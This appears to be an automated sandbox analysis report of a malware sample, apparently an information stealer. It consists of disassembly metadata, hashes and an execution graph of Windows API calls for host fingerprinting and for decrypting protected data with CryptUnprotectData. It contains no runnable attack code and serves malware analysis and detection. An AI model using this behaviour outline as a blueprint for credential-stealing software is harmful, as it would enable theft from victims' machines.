                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 158306478-0
                                                                                                                                                                                                                                        • Opcode ID: 530b2fa8ea6856cf945f35d836ce9875649dae2ebf57f0d51075d979221f68df
                                                                                                                                                                                                                                        • Instruction ID: c108eec3ed938d6cc8981e846a859a276a8ed5a6f7a3ce15a2e42e5da8f5e7d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 530b2fa8ea6856cf945f35d836ce9875649dae2ebf57f0d51075d979221f68df
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D11C8A19315167E67112771AD8FDAF7A5CDD563E87100229F50191102FE608E319EB2
                                                                                                                                                                                                                                        Function 002ACB2A Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 002ACB31
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002ACB3B
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 002ACB52
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002ACBAC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1383202999-0
                                                                                                                                                                                                                                        • Opcode ID: 93881a989bcc5c360a8094e821c8721275f134351a363febd9c97604befb4257
                                                                                                                                                                                                                                        • Instruction ID: c7467a72e1189cf3f15b4167dd46e397afb8495fddc2ed64d07252d0c82093dd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93881a989bcc5c360a8094e821c8721275f134351a363febd9c97604befb4257
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C11E131C2411A8BCB05EFA4D94A6BDB775AF46728F24480AE4116B381DF749E20CFA1
                                                                                                                                                                                                                                        Function 002C99D0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000), ref: 002C99E7
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?,?,?,002C2602,00000000), ref: 002C99F3
                                                                                                                                                                                                                                          • Part of subcall function 002C9A44: CloseHandle.KERNEL32(FFFFFFFE,002C9A03,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?,?), ref: 002C9A54
                                                                                                                                                                                                                                        • ___initconout.LIBCMT ref: 002C9A03
                                                                                                                                                                                                                                          • Part of subcall function 002C9A25: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002C99C1,002C8EAC,?,?,002C2CBC,?,00000000,00000000,?), ref: 002C9A38
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?), ref: 002C9A18
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2744216297-0
                                                                                                                                                                                                                                        • Opcode ID: 4ce98d8e452c6a2f14363cbddeffb7941e50eb03784f5d3ea4a9f0364275641c
                                                                                                                                                                                                                                        • Instruction ID: e35fc91e9444392d0eff6c11106f426f5c0abec80b421251d47aeced970e5a62
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ce98d8e452c6a2f14363cbddeffb7941e50eb03784f5d3ea4a9f0364275641c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F01C36811229BFCF226F91EC0CE893F66FB487A0F104515FE1D95160D6328DA0EB91
                                                                                                                                                                                                                                        Function 002AE5C7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 002AE5D9
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002AE5E8
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 002AE5F1
                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 002AE5FE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                        • Opcode ID: 6908aec6b1052d9a570ecb49a48a929965c5ed32083dcbbc439ea004506730ef
                                                                                                                                                                                                                                        • Instruction ID: 2ce6224cc3061221171bd5515d8034012c840288d948b4fd6b76695db0f9873e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6908aec6b1052d9a570ecb49a48a929965c5ed32083dcbbc439ea004506730ef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2DF06274D1120DEFCB00DBB4D94999EBBF4FF1C204BA18996E412E7550E730AB449B51
                                                                                                                                                                                                                                        Function 002BA350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,002BA251,?,?,00000000,00000000,00000000,?), ref: 002BA375
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EncodePointer
                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                        • Opcode ID: 4179731ae84908fa24cbb74cc4dee311ab8e37a358e494282f54e612c91d1cd7
                                                                                                                                                                                                                                        • Instruction ID: 3fce51ac08676d8b331f2fe1afcf819fd9583961faab45f24444090a38eb7f15
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4179731ae84908fa24cbb74cc4dee311ab8e37a358e494282f54e612c91d1cd7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F41883191020AEFCF15DF98CC85AEEBBB6BF08340F148099F90567221D375AA61DF52
                                                                                                                                                                                                                                        Function 002B9BBC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002B9E33
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                        • Opcode ID: 52c3b9c73bea181a9b13339cf9fca6cfe48e77e6a8da1a36e0509a2382428b8c
                                                                                                                                                                                                                                        • Instruction ID: 11c25cb41012ab17e458cb0874ad5cd2a7c98e95c424e9941fe9e469cede6107
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52c3b9c73bea181a9b13339cf9fca6cfe48e77e6a8da1a36e0509a2382428b8c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6431943282021A9BCF268F54C8449FA7BA9FF093A5B14815AFA9499121C377DCF1DB91
                                                                                                                                                                                                                                        Function 002A2A40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: GetctypeLockitLockit::_std::_
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 2423992667-3882152299
                                                                                                                                                                                                                                        • Opcode ID: 67081ef2ddd15b70f883adcce10d066f94efc01b0b5649a8d70536f5449f04bd
                                                                                                                                                                                                                                        • Instruction ID: 443adecab8155a0d4194ba72d749553157e6a29570b1cf1e5f95b2f412795fa0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67081ef2ddd15b70f883adcce10d066f94efc01b0b5649a8d70536f5449f04bd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2631F5B19187848BE310DF29C85531BBBE4AFE5308F04491CF5884B242EB75E5A8CBD3

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:5.9%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:42.9%
                                                                                                                                                                                                                                        Total number of Nodes:247
                                                                                                                                                                                                                                        Total number of Limit Nodes:22
                                                                                                                                                                                                                                        execution_graph 33734 42e343 CoSetProxyBlanket 33735 43b781 33736 43b822 33735->33736 33737 43bace 33736->33737 33739 43b480 LdrInitializeThunk 33736->33739 33739->33737 33740 4351c0 33741 4351dd 33740->33741 33743 435219 33741->33743 33744 43b480 LdrInitializeThunk 33741->33744 33744->33741 33755 40d6d0 33757 40d760 33755->33757 33756 40d7ae 33757->33756 33759 43b480 LdrInitializeThunk 33757->33759 33759->33756 33760 417e93 33764 417e98 33760->33764 33762 418066 33762->33762 33763 4180e6 33762->33763 33770 41c360 RtlAllocateHeap LdrInitializeThunk 33762->33770 33764->33762 33764->33763 33766 43d6c0 33764->33766 33767 43d6e0 33766->33767 33767->33767 33768 43d80e 33767->33768 33771 43b480 LdrInitializeThunk 33767->33771 33768->33762 33770->33763 33771->33768 33772 43bf91 33774 43bef0 33772->33774 33773 43bff7 33774->33773 33777 43b480 LdrInitializeThunk 33774->33777 33776 43c01d 33777->33776 33778 439b90 33779 439bc0 33778->33779 33780 439c2e 33779->33780 33788 43b480 LdrInitializeThunk 33779->33788 33781 439e01 33780->33781 33789 439b40 33780->33789 33785 439cb0 33787 439d3e 33785->33787 33792 43b480 LdrInitializeThunk 33785->33792 33793 439b60 33787->33793 33788->33780 33797 43ca60 33789->33797 33791 439b4a RtlAllocateHeap 33791->33785 33792->33787 33794 439b73 33793->33794 33795 439b75 33793->33795 33794->33781 33796 439b7a RtlFreeHeap 33795->33796 33796->33781 33798 43ca80 33797->33798 33798->33791 33798->33798 33799 40ce55 33800 40ce70 33799->33800 33803 436f90 33800->33803 33802 40ceb9 33804 436fc0 CoCreateInstance 33803->33804 33806 437181 SysAllocString 33804->33806 33807 437526 33804->33807 33810 4371fe 33806->33810 33808 437536 GetVolumeInformationW 33807->33808 33818 437558 33808->33818 33811 437516 SysFreeString 33810->33811 33812 437206 CoSetProxyBlanket 33810->33812 33811->33807 33813 437226 SysAllocString 33812->33813 33814 43750c 33812->33814 33816 4372f0 33813->33816 33814->33811 33816->33816 33817 437315 SysAllocString 33816->33817 33821 43733c 33817->33821 33818->33802 33819 4374fa SysFreeString SysFreeString 33819->33814 33820 4374f0 33820->33819 33821->33819 33821->33820 33822 437380 VariantInit 33821->33822 33824 4373d0 33822->33824 33823 4374df VariantClear 33823->33820 33824->33823 33825 42c6d7 33827 42c700 33825->33827 33826 42cbd4 GetPhysicallyInstalledSystemMemory 33826->33827 33827->33826 33828 40b218 33829 40b21b 33828->33829 33830 40b2b8 33829->33830 33832 43b420 33829->33832 33833 43b446 33832->33833 33834 43b465 33832->33834 33835 43b45a 33832->33835 33836 43b438 33832->33836 33839 43b44b RtlReAllocateHeap 33833->33839 33838 439b60 RtlFreeHeap 33834->33838 33837 439b40 RtlAllocateHeap 33835->33837 33836->33833 33836->33834 33840 43b460 33837->33840 33838->33840 33839->33840 33840->33829 33841 42bfda 33842 42c000 33841->33842 33843 42c0ed GetComputerNameExA 33842->33843 33844 42c140 33843->33844 33844->33844 33845 42c1bb GetComputerNameExA 33844->33845 33846 42c210 33845->33846 33847 42b65e 33848 42b679 33847->33848 33848->33848 33851 436c40 33848->33851 33852 436c4e 33851->33852 33855 436d33 33852->33855 33860 43b480 LdrInitializeThunk 33852->33860 33856 42d786 33855->33856 33857 436e1b 33855->33857 33859 43b480 LdrInitializeThunk 33855->33859 33857->33856 33861 43b480 LdrInitializeThunk 33857->33861 33859->33855 33860->33852 33861->33857 33862 434bdc 33863 434bf4 33862->33863 33864 434c09 GetUserDefaultUILanguage 33863->33864 33865 40a960 33867 40a990 33865->33867 33866 40ae26 33867->33866 33867->33867 33868 439b60 RtlFreeHeap 33867->33868 33868->33866 33869 421020 33870 421080 33869->33870 33871 42102e 33869->33871 33875 421140 33871->33875 33873 4210fc 33873->33870 33874 41ef30 RtlAllocateHeap LdrInitializeThunk 33873->33874 33874->33870 33876 421150 33875->33876 33876->33876 33877 43d6c0 LdrInitializeThunk 33876->33877 33878 42121f 33877->33878 33879 43b720 GetForegroundWindow 33883 43d320 33879->33883 33881 43b72e GetForegroundWindow 33882 43b74e 33881->33882 33884 43d330 33883->33884 33884->33881 33885 40ce23 CoInitializeSecurity 33886 43d920 33887 43d940 33886->33887 33890 43d98e 33887->33890 33892 43b480 LdrInitializeThunk 33887->33892 33888 43da2e 33890->33888 33893 43b480 LdrInitializeThunk 33890->33893 33892->33890 33893->33888 33894 43bc65 33895 43bc90 33894->33895 33898 43bcde 33895->33898 33901 43b480 LdrInitializeThunk 33895->33901 33896 43bd6f 33898->33896 33902 43b480 LdrInitializeThunk 33898->33902 33900 43bde7 33901->33898 33902->33900 33903 40e2a9 33909 4097b0 33903->33909 33905 40e2b5 CoUninitialize 33906 40e2e0 33905->33906 33907 40e673 CoUninitialize 33906->33907 33908 40e690 33907->33908 33910 4097c4 33909->33910 33910->33905 33911 4087f0 33913 4087fc 33911->33913 33912 408979 ExitProcess 33913->33912 33914 408811 GetCurrentProcessId GetCurrentThreadId 33913->33914 33915 40896f 33913->33915 33916 408851 GetForegroundWindow 33914->33916 33917 40884b 33914->33917 33915->33912 33918 4088d8 33916->33918 33917->33916 33918->33915 33920 40cdf0 CoInitializeEx 33918->33920 33921 431bb0 33922 431be5 GetSystemMetrics GetSystemMetrics 33921->33922 33923 431c28 33922->33923 33924 430879 33927 414a30 33924->33927 33926 43087e CoSetProxyBlanket 33927->33926 33928 40ebbc 33929 40ebc5 33928->33929 33958 4233a0 33929->33958 33931 40ebcb 33967 423a00 33931->33967 33933 40ebeb 33973 423d30 33933->33973 33935 40ec0b 33981 425920 33935->33981 33962 4233f0 33958->33962 33959 4234c6 33959->33931 33960 423797 33960->33959 33960->33960 34016 4215f0 33960->34016 33962->33959 33962->33960 33962->33962 33963 4235f1 33962->33963 33965 43d6c0 LdrInitializeThunk 33962->33965 33963->33959 33963->33960 33963->33963 33964 423781 GetLogicalDrives 33963->33964 33966 43d6c0 LdrInitializeThunk 33964->33966 33965->33963 33966->33960 33968 423aa0 33967->33968 33968->33968 33969 423cf7 33968->33969 33971 423c0f 33968->33971 34040 43dfb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 33968->34040 33969->33933 34039 41eeb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 33971->34039 33974 423d3e 33973->33974 34042 43dbd0 33974->34042 33976 423cf7 33976->33935 33978 423c0f 33978->33978 34041 41eeb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 33978->34041 33979 423ba0 33979->33976 33979->33978 34046 43dfb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 33979->34046 33982 425b80 33981->33982 33983 40ec2b 33981->33983 33985 425947 33981->33985 33992 425bc5 33981->33992 33984 43b420 3 API calls 33982->33984 33993 426170 33983->33993 33984->33992 33985->33982 33985->33983 33985->33985 33988 43dbd0 LdrInitializeThunk 33985->33988 33985->33992 34068 43dfb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 33985->34068 33986 43dbd0 LdrInitializeThunk 33986->33992 33988->33985 33991 43b480 LdrInitializeThunk 33991->33992 33992->33983 33992->33986 33992->33991 34048 43dcf0 33992->34048 34058 43e690 33992->34058 33994 426190 33993->33994 33996 4261ee 33994->33996 34073 43b480 LdrInitializeThunk 33994->34073 33995 40ec34 34003 426500 33995->34003 33996->33995 33998 439b40 RtlAllocateHeap 33996->33998 34000 426298 33998->34000 33999 439b60 RtlFreeHeap 33999->33995 34002 42630e 34000->34002 34074 43b480 LdrInitializeThunk 34000->34074 34002->33999 34002->34002 34075 426520 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 34003->34075 34031 43d520 34016->34031 34018 42163c 34018->33959 34019 421630 34019->34018 34020 439b40 RtlAllocateHeap 34019->34020 34021 421674 34020->34021 34025 42172f 34021->34025 34035 43b480 LdrInitializeThunk 34021->34035 34023 421d28 34024 439b60 RtlFreeHeap 34023->34024 34027 421d38 34024->34027 34025->34023 34026 439b40 RtlAllocateHeap 34025->34026 34030 439b60 RtlFreeHeap 34025->34030 34036 43b480 LdrInitializeThunk 34025->34036 34026->34025 34027->34018 34037 43b480 LdrInitializeThunk 34027->34037 34030->34025 34033 43d540 34031->34033 34032 43d66e 34032->34019 34033->34032 34038 43b480 LdrInitializeThunk 34033->34038 34035->34021 34036->34025 34037->34027 34038->34032 34039->33969 34040->33968 34041->33976 34043 43dbf0 34042->34043 34044 43dcbf 34043->34044 34047 43b480 LdrInitializeThunk 34043->34047 34044->33979 34046->33979 34047->34044 34049 43dd10 34048->34049 34050 43dd5e 34049->34050 34069 43b480 LdrInitializeThunk 34049->34069 34052 439b40 RtlAllocateHeap 34050->34052 34055 43df9c 34050->34055 34054 43ddf1 34052->34054 34053 439b60 RtlFreeHeap 34053->34055 34057 43de6f 34054->34057 34070 43b480 LdrInitializeThunk 34054->34070 34055->33992 34057->34053 34059 43e69f 34058->34059 34061 43e7ee 34059->34061 34071 43b480 LdrInitializeThunk 34059->34071 34060 43ea97 34060->33992 34061->34060 34063 439b40 RtlAllocateHeap 34061->34063 34064 43e883 34063->34064 34067 43e93e 34064->34067 34072 43b480 LdrInitializeThunk 34064->34072 34065 439b60 RtlFreeHeap 34065->34060 34067->34065 34068->33985 34069->34050 34070->34057 34071->34061 34072->34067 34073->33996 34074->34002 34076 416b7e 34078 416b90 34076->34078 34077 416d37 CryptUnprotectData 34079 416d56 34077->34079 34078->34077

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00431BB0 Relevance: 47.4, APIs: 2, Strings: 25, Instructions: 179COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 431bb0-431c9c GetSystemMetrics * 2 6 431ca3-432087 0->6
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MetricsSystem
                                                                                                                                                                                                                                        • String ID: $&)C$;(C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$='C$S%C$b(C$#C
                                                                                                                                                                                                                                        • API String ID: 4116985748-628680385
                                                                                                                                                                                                                                        • Opcode ID: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                                                                                                                                                                                        • Instruction ID: ea45c71986b2e534ecec44a4126f62931ddcc8577b73b097e58ed3aa899a90b6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41B16FB04097818FE771DF14D48879BBBE0BBC5308F508A2EE5E89B251CBB95448CF86
                                                                                                                                                                                                                                        Function 00436F90 Relevance: 35.6, APIs: 11, Strings: 9, Instructions: 571memorycomCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
